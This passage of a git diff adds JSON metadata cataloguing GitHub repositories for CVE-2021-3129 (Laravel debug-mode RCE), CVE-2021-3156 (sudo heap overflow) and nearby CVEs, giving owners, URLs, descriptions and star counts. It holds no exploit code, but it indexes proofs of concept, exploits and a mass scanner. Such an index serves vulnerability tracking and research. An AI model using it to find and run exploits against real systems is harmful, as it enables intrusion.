<8.4.2", + "fork": false, + "created_at": "2022-09-03T15:25:35Z", + "updated_at": "2024-03-11T03:48:18Z", + "pushed_at": "2022-09-03T17:22:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 543723972, + "name": "CVE-2021-3129", + "full_name": "hupe1980\/CVE-2021-3129", + "owner": { + "login": "hupe1980", + "id": 24973437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hupe1980\/CVE-2021-3129", + "description": "Laravel debug mode - Remote Code Execution (RCE)", + "fork": false, + "created_at": "2022-09-30T17:54:17Z", + "updated_at": "2022-09-30T21:03:46Z", + "pushed_at": "2022-09-30T21:02:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3129", + "laravel" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 549483301, + "name": "CVE-2021-3129", + "full_name": "0nion1\/CVE-2021-3129", + "owner": { + "login": "0nion1", + "id": 53221874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53221874?v=4", + "html_url": "https:\/\/github.com\/0nion1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0nion1\/CVE-2021-3129", + "description": "CVE-2021-3129-Laravel Debug mode", + "fork": false, + "created_at": "2022-10-11T08:53:05Z", + "updated_at": "2024-05-29T04:42:58Z", + "pushed_at": "2022-10-11T08:57:34Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 576503076, + "name": "Laravel-debug-Checker", + "full_name": "MadExploits\/Laravel-debug-Checker", + "owner": { + "login": "MadExploits", + "id": 80827394, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80827394?v=4", + "html_url": "https:\/\/github.com\/MadExploits", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MadExploits\/Laravel-debug-Checker", + "description": "CVE-2021-3129 Exploit Checker By .\/MrMad", + "fork": false, + "created_at": "2022-12-10T03:32:34Z", + "updated_at": "2024-10-15T11:18:56Z", + "pushed_at": "2024-03-20T14:21:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3129", + "laravel-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609599518, + "name": "CVE-2021-3129-exp", + "full_name": "ajisai-babu\/CVE-2021-3129-exp", + "owner": { + "login": "ajisai-babu", + "id": 30685957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30685957?v=4", + "html_url": "https:\/\/github.com\/ajisai-babu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajisai-babu\/CVE-2021-3129-exp", + "description": "Laravel Debug mode RCE漏洞(CVE-2021-3129)poc \/ exp", + "fork": false, + "created_at": "2023-03-04T17:04:38Z", + "updated_at": "2024-10-20T13:20:58Z", + "pushed_at": "2023-03-04T17:10:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612652775, + "name": "CVE-2021-3129", + "full_name": "keyuan15\/CVE-2021-3129", + "owner": { + "login": "keyuan15", + "id": 56430812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56430812?v=4", + "html_url": "https:\/\/github.com\/keyuan15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keyuan15\/CVE-2021-3129", + "description": "Laravel RCE CVE-2021-3129", + "fork": false, + "created_at": "2023-03-11T15:31:37Z", + "updated_at": "2024-01-14T10:30:07Z", + "pushed_at": "2023-03-11T15:33:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624319568, + "name": "cve-2021-3129", + "full_name": "qaisarafridi\/cve-2021-3129", + "owner": { + "login": "qaisarafridi", + "id": 37263794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37263794?v=4", + "html_url": "https:\/\/github.com\/qaisarafridi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qaisarafridi\/cve-2021-3129", + "description": null, + "fork": false, + "created_at": "2023-04-06T07:56:33Z", + "updated_at": "2023-04-06T07:56:33Z", + "pushed_at": "2023-04-06T07:56:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634732295, + "name": "CVE-2021-3129", + "full_name": "Zoo1sondv\/CVE-2021-3129", + "owner": { + "login": "Zoo1sondv", + "id": 114736274, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114736274?v=4", + "html_url": "https:\/\/github.com\/Zoo1sondv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zoo1sondv\/CVE-2021-3129", + "description": null, + "fork": false, + "created_at": "2023-05-01T03:20:13Z", + "updated_at": "2023-05-01T03:40:47Z", + "pushed_at": "2023-06-03T10:12:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670956112, + "name": "CVE-2021-3129", + "full_name": "miko550\/CVE-2021-3129", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2021-3129", + "description": "Laravel RCE (CVE-2021-3129)", + "fork": false, + "created_at": "2023-07-26T08:05:25Z", + "updated_at": "2023-07-26T08:26:35Z", + "pushed_at": "2023-07-26T08:43:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 671479775, + "name": "CVE-2021-3129", + "full_name": "wmasday\/CVE-2021-3129", + "owner": { + "login": "wmasday", + "id": 52761911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52761911?v=4", + "html_url": "https:\/\/github.com\/wmasday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wmasday\/CVE-2021-3129", + "description": "CVE-2021-3129 | Laravel Debug Mode Vulnerability", + "fork": false, + "created_at": "2023-07-27T12:14:01Z", + "updated_at": "2023-09-03T00:29:08Z", + "pushed_at": "2023-07-27T12:28:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708424437, + "name": "Mass-CVE-2021-3129-Scanner", + "full_name": "banyaksepuh\/Mass-CVE-2021-3129-Scanner", + "owner": { + "login": "banyaksepuh", + "id": 113920644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113920644?v=4", + "html_url": "https:\/\/github.com\/banyaksepuh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/banyaksepuh\/Mass-CVE-2021-3129-Scanner", + "description": null, + "fork": false, + "created_at": "2023-10-22T14:25:38Z", + "updated_at": "2023-10-22T14:35:06Z", + "pushed_at": "2023-10-22T14:41:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 743409236, + "name": "CVE-2021-3129", + "full_name": "Axianke\/CVE-2021-3129", + "owner": { + "login": "Axianke", + "id": 60959602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60959602?v=4", + "html_url": "https:\/\/github.com\/Axianke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axianke\/CVE-2021-3129", + "description": "CVE-2021-3129", + "fork": false, + "created_at": "2024-01-15T07:12:07Z", + "updated_at": "2024-09-05T08:43:22Z", + "pushed_at": "2024-01-15T07:15:00Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803011028, + "name": "CVE-2021-3129", + "full_name": "cc3305\/CVE-2021-3129", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2021-3129", + "description": "A exploit script for CVE-2021-3129", + "fork": false, + "created_at": "2024-05-19T21:25:25Z", + "updated_at": "2024-07-27T20:15:21Z", + "pushed_at": "2024-07-27T20:15:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829299358, + "name": "CVE-2021-3129-", + "full_name": "piperpwn\/CVE-2021-3129-", + "owner": { + "login": "piperpwn", + "id": 77881655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77881655?v=4", + "html_url": "https:\/\/github.com\/piperpwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/piperpwn\/CVE-2021-3129-", + "description": "Laravel Debug Mode and Payload", + "fork": false, + "created_at": "2024-07-16T06:48:24Z", + "updated_at": "2024-07-16T06:58:38Z", + "pushed_at": "2024-07-16T06:58:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864762865, + "name": "CVE-2021-3129", + "full_name": "0x0d3ad\/CVE-2021-3129", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2021-3129", + "description": "CVE-2021-3129 Laravel Ignition RCE Exploit", + "fork": false, + "created_at": "2024-09-29T05:09:41Z", + "updated_at": "2024-10-05T05:58:32Z", + "pushed_at": "2024-10-05T05:58:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881338746, + "name": "CVE-2021-3129", + "full_name": "GodOfServer\/CVE-2021-3129", + "owner": { + "login": "GodOfServer", + "id": 184205862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184205862?v=4", + "html_url": "https:\/\/github.com\/GodOfServer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GodOfServer\/CVE-2021-3129", + "description": null, + "fork": false, + "created_at": "2024-10-31T11:30:23Z", + "updated_at": "2024-10-31T11:31:41Z", + "pushed_at": "2024-10-31T11:31:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31290.json b/2021/CVE-2021-31290.json new file mode 100644 index 0000000000..1a7f520c7c --- /dev/null +++ b/2021/CVE-2021-31290.json @@ -0,0 +1,33 @@ +[ + { + "id": 624319893, + "name": "cve-2021-31290", + "full_name": "qaisarafridi\/cve-2021-31290", + "owner": { + "login": "qaisarafridi", + "id": 37263794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37263794?v=4", + "html_url": "https:\/\/github.com\/qaisarafridi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qaisarafridi\/cve-2021-31290", + "description": null, + "fork": false, + "created_at": "2023-04-06T07:57:29Z", + "updated_at": "2023-04-06T07:58:00Z", + "pushed_at": "2023-04-06T07:57:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3130.json b/2021/CVE-2021-3130.json new file mode 100644 index 0000000000..fee8bdf1da --- /dev/null +++ b/2021/CVE-2021-3130.json @@ -0,0 +1,33 @@ +[ + { + "id": 331557374, + "name": "CVE-2021-3130", + "full_name": "jet-pentest\/CVE-2021-3130", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-3130", + "description": null, + "fork": false, + "created_at": "2021-01-21T08:04:32Z", + "updated_at": "2021-02-14T09:24:07Z", + "pushed_at": "2021-01-21T12:31:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3131.json b/2021/CVE-2021-3131.json new file mode 100644 index 0000000000..f14718692b --- /dev/null +++ b/2021/CVE-2021-3131.json @@ -0,0 +1,33 @@ +[ + { + "id": 329230328, + "name": "CVE-2021-3131", + "full_name": "jet-pentest\/CVE-2021-3131", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-3131", + "description": "CVE-2021-3131", + "fork": false, + "created_at": "2021-01-13T07:41:25Z", + "updated_at": "2022-12-19T10:01:54Z", + "pushed_at": "2021-01-13T07:54:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3138.json b/2021/CVE-2021-3138.json new file mode 100644 index 0000000000..41c6224004 --- /dev/null +++ b/2021/CVE-2021-3138.json @@ -0,0 +1,33 @@ +[ + { + "id": 329132844, + "name": "CVE-2021-3138", + "full_name": "Mesh3l911\/CVE-2021-3138", + "owner": { + "login": "Mesh3l911", + "id": 74990355, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4", + "html_url": "https:\/\/github.com\/Mesh3l911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-3138", + "description": "Discource POC", + "fork": false, + "created_at": "2021-01-12T22:50:27Z", + "updated_at": "2021-05-04T19:08:13Z", + "pushed_at": "2021-05-04T19:08:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3156.json b/2021/CVE-2021-3156.json new file mode 100644 index 0000000000..489160cad3 --- /dev/null +++ b/2021/CVE-2021-3156.json @@ -0,0 +1,2350 @@ +[ + { + "id": 333199828, + "name": "CVE-2021-3156", + "full_name": "mr-r3b00t\/CVE-2021-3156", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-01-26T19:53:04Z", + "updated_at": "2024-08-12T20:09:47Z", + "pushed_at": "2021-01-26T20:09:53Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 34, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 333450928, + "name": "sudo_cve-2021-3156", + "full_name": "nexcess\/sudo_cve-2021-3156", + "owner": { + "login": "nexcess", + "id": 651829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/651829?v=4", + "html_url": "https:\/\/github.com\/nexcess", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nexcess\/sudo_cve-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-01-27T14:40:57Z", + "updated_at": "2023-02-28T06:13:14Z", + "pushed_at": "2021-01-27T18:21:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 333483141, + "name": "CVE-2021-3156", + "full_name": "reverse-ex\/CVE-2021-3156", + "owner": { + "login": "reverse-ex", + "id": 77421345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77421345?v=4", + "html_url": "https:\/\/github.com\/reverse-ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reverse-ex\/CVE-2021-3156", + "description": "CVE-2021-3156", + "fork": false, + "created_at": "2021-01-27T16:03:34Z", + "updated_at": "2024-08-12T20:09:49Z", + "pushed_at": "2021-01-31T04:56:56Z", + "stargazers_count": 111, + "watchers_count": 111, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 111, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 333492305, + "name": "CVE-2021-3156", + "full_name": "unauth401\/CVE-2021-3156", + "owner": { + "login": "unauth401", + "id": 61272656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61272656?v=4", + "html_url": "https:\/\/github.com\/unauth401", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unauth401\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-01-27T16:35:43Z", + "updated_at": "2024-08-12T20:09:49Z", + "pushed_at": "2021-01-27T15:19:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 333557918, + "name": "CVE-2021-3156", + "full_name": "ymrsmns\/CVE-2021-3156", + "owner": { + "login": "ymrsmns", + "id": 25608325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25608325?v=4", + "html_url": "https:\/\/github.com\/ymrsmns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ymrsmns\/CVE-2021-3156", + "description": "CVE-2021-3156", + "fork": false, + "created_at": "2021-01-27T20:57:00Z", + "updated_at": "2021-01-31T13:08:37Z", + "pushed_at": "2021-01-31T13:08:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 333569622, + "name": "CVE-2021-3156-PATCHER", + "full_name": "elbee-cyber\/CVE-2021-3156-PATCHER", + "owner": { + "login": "elbee-cyber", + "id": 66045908, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66045908?v=4", + "html_url": "https:\/\/github.com\/elbee-cyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elbee-cyber\/CVE-2021-3156-PATCHER", + "description": "This simple bash script will patch the recently discovered sudo heap overflow vulnerability.", + "fork": false, + "created_at": "2021-01-27T21:49:06Z", + "updated_at": "2023-08-28T18:21:53Z", + "pushed_at": "2021-01-28T05:25:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 333619288, + "name": "CVE-2021-3156-Baron-Samedit", + "full_name": "kernelzeroday\/CVE-2021-3156-Baron-Samedit", + "owner": { + "login": "kernelzeroday", + "id": 11334159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11334159?v=4", + "html_url": "https:\/\/github.com\/kernelzeroday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kernelzeroday\/CVE-2021-3156-Baron-Samedit", + "description": "1day research effort", + "fork": false, + "created_at": "2021-01-28T02:13:49Z", + "updated_at": "2021-06-23T04:08:28Z", + "pushed_at": "2021-01-29T03:21:13Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 333620703, + "name": "cve-2021-3156", + "full_name": "yaunsky\/cve-2021-3156", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/cve-2021-3156", + "description": "cve-2021-3156;sudo堆溢出漏洞;漏洞检测", + "fork": false, + "created_at": "2021-01-28T02:20:24Z", + "updated_at": "2022-11-12T19:46:49Z", + "pushed_at": "2021-01-28T02:21:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 333700525, + "name": "CVE-2021-3156-Exp", + "full_name": "baka9moe\/CVE-2021-3156-Exp", + "owner": { + "login": "baka9moe", + "id": 17043012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17043012?v=4", + "html_url": "https:\/\/github.com\/baka9moe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/baka9moe\/CVE-2021-3156-Exp", + "description": null, + "fork": false, + "created_at": "2021-01-28T08:55:04Z", + "updated_at": "2021-05-14T12:43:48Z", + "pushed_at": "2021-01-28T09:12:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 333714882, + "name": "CVE-2021-3156", + "full_name": "ph4ntonn\/CVE-2021-3156", + "owner": { + "login": "ph4ntonn", + "id": 45198234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45198234?v=4", + "html_url": "https:\/\/github.com\/ph4ntonn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph4ntonn\/CVE-2021-3156", + "description": "CVE-2021-3156", + "fork": false, + "created_at": "2021-01-28T09:52:55Z", + "updated_at": "2021-01-29T00:08:11Z", + "pushed_at": "2021-01-28T10:02:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-3156" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 334027841, + "name": "CVE-2021-3156-SCRIPT", + "full_name": "binw2018\/CVE-2021-3156-SCRIPT", + "owner": { + "login": "binw2018", + "id": 49139970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49139970?v=4", + "html_url": "https:\/\/github.com\/binw2018", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/binw2018\/CVE-2021-3156-SCRIPT", + "description": null, + "fork": false, + "created_at": "2021-01-29T03:34:31Z", + "updated_at": "2021-02-03T10:32:24Z", + "pushed_at": "2021-01-29T06:49:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334128649, + "name": "CVE-2021-3156", + "full_name": "freeFV\/CVE-2021-3156", + "owner": { + "login": "freeFV", + "id": 32540878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32540878?v=4", + "html_url": "https:\/\/github.com\/freeFV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeFV\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-01-29T11:44:37Z", + "updated_at": "2021-04-29T12:50:44Z", + "pushed_at": "2021-01-29T11:36:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334242353, + "name": "CVE-2021-3156", + "full_name": "mbcrump\/CVE-2021-3156", + "owner": { + "login": "mbcrump", + "id": 534885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/534885?v=4", + "html_url": "https:\/\/github.com\/mbcrump", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbcrump\/CVE-2021-3156", + "description": "Notes regarding CVE-2021-3156: Heap-Based Buffer Overflow in Sudo", + "fork": false, + "created_at": "2021-01-29T19:24:41Z", + "updated_at": "2024-06-28T11:32:21Z", + "pushed_at": "2021-01-31T02:21:37Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3156", + "linux", + "wsl" + ], + "visibility": "public", + "forks": 4, + "watchers": 38, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 334318140, + "name": "CVE-2021-3156", + "full_name": "stong\/CVE-2021-3156", + "owner": { + "login": "stong", + "id": 14918218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14918218?v=4", + "html_url": "https:\/\/github.com\/stong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stong\/CVE-2021-3156", + "description": "PoC for CVE-2021-3156 (sudo heap overflow)", + "fork": false, + "created_at": "2021-01-30T03:22:04Z", + "updated_at": "2024-11-23T01:56:23Z", + "pushed_at": "2022-04-14T11:51:18Z", + "stargazers_count": 431, + "watchers_count": 431, + "has_discussions": false, + "forks_count": 110, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 110, + "watchers": 431, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 334390097, + "name": "CVE-2021-3156", + "full_name": "nobodyatall648\/CVE-2021-3156", + "owner": { + "login": "nobodyatall648", + "id": 35725871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2021-3156", + "description": "checking CVE-2021-3156 vulnerability & patch script", + "fork": false, + "created_at": "2021-01-30T10:53:26Z", + "updated_at": "2024-01-17T14:12:38Z", + "pushed_at": 